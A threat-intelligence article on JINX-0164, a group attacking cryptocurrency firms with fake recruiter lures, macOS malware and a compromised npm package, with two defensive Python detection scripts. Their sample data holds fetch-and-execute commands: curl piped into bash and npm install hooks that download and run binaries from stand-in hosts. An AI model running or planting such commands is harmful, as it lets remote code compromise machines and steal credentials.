A previously unknown cyber threat group, identified as JINX-0164, has embarked on a malicious campaign targeting cryptocurrency companies. The group uses recruitment-themed social engineering tactics paired with custom macOS malware to facilitate the theft of digital assets.
Social Engineering and Malware Deployment
Researchers from Wiz, including Shira Ayal and Eden Abergil, have highlighted how JINX-0164 employs advanced social engineering strategies. By targeting employees through fake recruiter lures, the group gains access to internal systems. This includes moving from compromised laptops to critical code distribution networks and development infrastructures.
According to Wiz, the Google-owned cloud security firm tracking the group, JINX-0164 has been active since mid-2025. Its motivation appears to be financial, with a strong focus on compromising developers in order to siphon cryptocurrency. One observed intrusion involved a supply chain attack, indicating the group's sophisticated approach.
Technical Details of the Attack
JINX-0164 typically initiates contact through credible LinkedIn profiles, inviting victims to a virtual meeting. This meeting directs targets to a fraudulent domain posing as a teleconference service, where they are tricked into downloading malware.
The initial download retrieves a Python-based macOS infostealer and a remote access trojan named AUDIOFIX, executed via a bash script from a fake domain resembling a driver store. This payload, disguised as a system audio driver, is compatible with both Intel and Apple Silicon systems.
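The delivery chain described above (a shell script fetched from a lookalike domain, piped into an interpreter, dropping a Python payload disguised as an audio driver) leaves a recognizable parent/child process pattern on the endpoint. The following is an added detection example written for this article; it is not code from Wiz or from the malware, and the process events, domain names and file paths in it are constructed for illustration.

```python
import re

# Constructed sample process-execution events, in the shape an EDR or
# macOS Endpoint Security log might emit. None of these values are real IoCs.
SAMPLE_EVENTS = [
    {"pid": 501, "ppid": 300, "parent": "Safari",
     "cmd": "/bin/bash -c 'curl -fsSL https://driver-store.example/audio/fix.sh | bash'"},
    {"pid": 502, "ppid": 501, "parent": "bash",
     "cmd": "/usr/bin/python3 /tmp/.audiofix/collect.py"},
    {"pid": 503, "ppid": 1, "parent": "launchd",
     "cmd": "/usr/sbin/coreaudiod"},                      # legitimate system audio daemon
    {"pid": 504, "ppid": 300, "parent": "Terminal",
     "cmd": "/bin/bash -c 'brew install wget'"},           # benign use of a shell
    {"pid": 505, "ppid": 1, "parent": "launchd",
     "cmd": "/Users/dev/Library/Audio/Plug-Ins/AudioFix.app/Contents/MacOS/AudioFix"},
]

# Rule 1: a network fetch piped straight into a shell ("curl ... | bash").
FETCH_PIPE_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b")
# Rule 2: a script interpreter started by a process already flagged by another rule.
SCRIPT_INTERPRETER = re.compile(r"(^|/)(python3?|osascript|sh|bash|zsh)\b")
# Rule 3: an executable named like an audio driver that lives outside system paths.
DRIVER_LURE_NAME = re.compile(r"audio|driver", re.IGNORECASE)
SYSTEM_PATHS = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")


def executable(event):
    """First token of the command line, i.e. the binary that was executed."""
    return event["cmd"].split()[0]


def triage(events):
    """Return {pid: [rule names]} for every event that matches a heuristic."""
    findings = {}
    # First pass: rules that depend only on the event itself.
    for ev in events:
        exe = executable(ev)
        if FETCH_PIPE_EXEC.search(ev["cmd"]):
            findings.setdefault(ev["pid"], []).append("fetch-pipe-exec")
        name = exe.rsplit("/", 1)[-1]
        if DRIVER_LURE_NAME.search(name) and not exe.startswith(SYSTEM_PATHS):
            findings.setdefault(ev["pid"], []).append("driver-lure-outside-system-path")
    # Second pass: propagate suspicion down the process tree until nothing changes,
    # so an interpreter spawned by a flagged shell (or its descendants) is caught.
    changed = True
    while changed:
        changed = False
        for ev in events:
            if (ev["ppid"] in findings and ev["pid"] not in findings
                    and SCRIPT_INTERPRETER.search(executable(ev))):
                findings[ev["pid"]] = ["interpreter-child-of-flagged"]
                changed = True
    return findings


if __name__ == "__main__":
    for pid, rules in sorted(triage(SAMPLE_EVENTS).items()):
        print(pid, ", ".join(rules))
```

Rule 3 is deliberately conservative: a real audio daemon under /usr/sbin is left alone, while an "AudioFix" binary running from a user-writable Library folder is surfaced for review. In a production pipeline the same three checks would be fed by real process telemetry rather than the constructed list here.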
Data Breaches and Broader Implications
The malware enables the theft of sensitive data, including credentials from password managers and cryptocurrency wallet details. Additionally, AUDIOFIX supports various malicious commands, allowing for data exfiltration and further system compromises.
JINX-0164 also utilizes MiniRAT, a Go-based backdoor, distributed through a compromised npm package. This tool can upload files, execute shell commands, and fetch additional malicious payloads.
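A backdoor delivered through a compromised npm package usually rides on a lifecycle script (preinstall, install, postinstall) that fetches and runs a binary during `npm install`. The following is an added auditing example, not code from Wiz or from the npm ecosystem; the package manifests, URLs and paths are constructed for illustration, and the heuristics are an assumption about what such install hooks tend to look like rather than a published signature.

```python
import re

# Hooks that npm runs automatically during installation.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
# A script that reaches out to the network...
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b|https?://", re.IGNORECASE)
# ...and also executes or stages something it fetched.
EXEC_OR_DROP = re.compile(
    r"chmod\s+\+x|\|\s*(ba|z)?sh\b|\bchild_process\b|\bexecSync\b|\bspawn\b|"
    r"\$\(\s*(curl|wget)|/tmp/|\beval\b")

# Constructed package.json contents standing in for installed dependencies.
SAMPLE_PACKAGES = {
    "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0",
                     "scripts": {"test": "node test.js"}},
    "wallet-utils": {"name": "wallet-utils", "version": "2.3.1",
                     "scripts": {"postinstall":
                                 "curl -s https://cdn.example/agent -o /tmp/.m "
                                 "&& chmod +x /tmp/.m && /tmp/.m"}},
    "build-helper": {"name": "build-helper", "version": "0.9.0",
                     "scripts": {"preinstall":
                                 "node -e \"require('child_process')"
                                 ".execSync('curl -fsSL https://x.example/i.sh | sh')\"",
                                 "install": "node-gyp rebuild"}},
    "docs-only":    {"name": "docs-only", "version": "3.0.0",
                     "scripts": {"postinstall":
                                 "echo see https://docs.example for setup"}},
}


def audit_package(manifest):
    """Return [(hook, reason)] for suspicious lifecycle scripts in one package.json."""
    hits = []
    for hook, script in manifest.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        fetches = bool(REMOTE_FETCH.search(script))
        executes = bool(EXEC_OR_DROP.search(script))
        if fetches and executes:
            hits.append((hook, "remote fetch combined with execution or file drop"))
        elif executes and "/tmp/" in script:
            hits.append((hook, "writes to or runs from /tmp during install"))
    return hits


def audit_tree(packages):
    """Audit a mapping of package name -> parsed package.json; keep only packages with hits."""
    report = {}
    for name, manifest in packages.items():
        hits = audit_package(manifest)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in audit_tree(SAMPLE_PACKAGES).items():
        for hook, reason in hits:
            print(f"{name}: {hook}: {reason}")
```

To run this against a real project, walk `node_modules/*/package.json`, parse each file with `json.load`, and pass the resulting mapping to `audit_tree`. Requiring both a network fetch and an execution pattern keeps a package whose postinstall merely prints a documentation URL out of the report; a native module's `node-gyp rebuild` is likewise left alone.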
While some tactics resemble those of North Korean cyber groups, Wiz researchers have found no direct infrastructure links to confirm such connections.
Conclusion and Future Outlook
The activities of JINX-0164 underscore the evolving threat landscape facing cryptocurrency firms. Given the group's sophisticated techniques and clear financial motive, organizations are urged to strengthen their security controls, in particular around recruiter-themed outreach, developer endpoints and third-party package installation. Continuous monitoring and user awareness remain crucial to mitigating threats of this kind.
